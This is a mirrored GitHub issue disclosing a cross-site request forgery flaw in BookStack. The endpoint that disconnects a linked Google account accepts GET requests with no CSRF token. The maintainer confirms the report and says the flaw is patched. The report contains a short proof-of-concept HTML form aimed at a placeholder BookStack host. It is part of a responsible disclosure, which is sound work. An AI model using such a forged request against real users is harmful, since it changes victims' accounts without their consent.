Cross Site Request Forgery To Disconnect Social Accounts #2294

New Issue

OVERLORD · 2026-02-05T03:35:18+03:00

OVERLORD commented

2026-02-05 03:35:18 +03:00

Originally created by @bishal0x01 on GitHub (Jun 14, 2021).

Hello team,

I noticed that in "Disconnect Social Accounts" parameter request is going in the HTTP GET method and did not generate CSRF token.

Steps to reproduce:-

Login your BookStack account as https://bookstack.yoururl.com
Now navigate to the "Edit profile" or go to the https://bookstack.yoururl.com/user/{id}
Then click on https://bookstack.yoururl.com/login/service/google/detach or save the following code as csrf.html and sent it to ther another user.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://bookstack.yoururl.com/login/service/google/detach">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

As you can see Social Accounts i.e google has been disconnected.

Impact: By sending a link it is possible to disconnect the user's Social Accounts.

Mitigation: Request should be sent in POST or should be generated CSRF token.

If you need information please let me know.

Best regards,
Bishal

Originally created by @bishal0x01 on GitHub (Jun 14, 2021). Hello team, I noticed that in "Disconnect Social Accounts" parameter request is going in the HTTP GET method and did not generate CSRF token. Steps to reproduce:- 1. Login your BookStack account as https://bookstack.yoururl.com 2. Now navigate to the "Edit profile" or go to the https://bookstack.yoururl.com/user/{id} 3. Then click on https://bookstack.yoururl.com/login/service/google/detach or save the following code as csrf.html and sent it to ther another user. ```html <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://bookstack.yoururl.com/login/service/google/detach"> <input type="submit" value="Submit request" /> </form> </body> </html> ``` 4. As you can see Social Accounts i.e google has been disconnected. Impact: By sending a link it is possible to disconnect the user's Social Accounts. Mitigation: Request should be sent in POST or should be generated CSRF token. If you need information please let me know. Best regards, Bishal

OVERLORD added the 🛠️ Enhancement 🔒 Security labels 2026-02-05 03:35:18 +03:00

OVERLORD closed this issue

2026-02-05 03:35:24 +03:00

OVERLORD commented

2026-02-05 03:35:28 +03:00

@ssddanbrown commented on GitHub (Jun 15, 2021):

Thanks @bishal0x01,
Not a major concern for this endpoint but probably should be a POST with CSRF as stated.
Now patched in 7d951b842c for the next patch release.

@ssddanbrown commented on GitHub (Jun 15, 2021): Thanks @bishal0x01, Not a major concern for this endpoint but probably should be a POST with CSRF as stated. Now patched in 7d951b842c762999e009e8ab330832788869566e for the next patch release.

Sign in to join this conversation.

Branches Tags

1 Participants

Notifications

Due Date

No due date set.

Dependencies

No dependencies set.

Reference: starred/BookStack#2294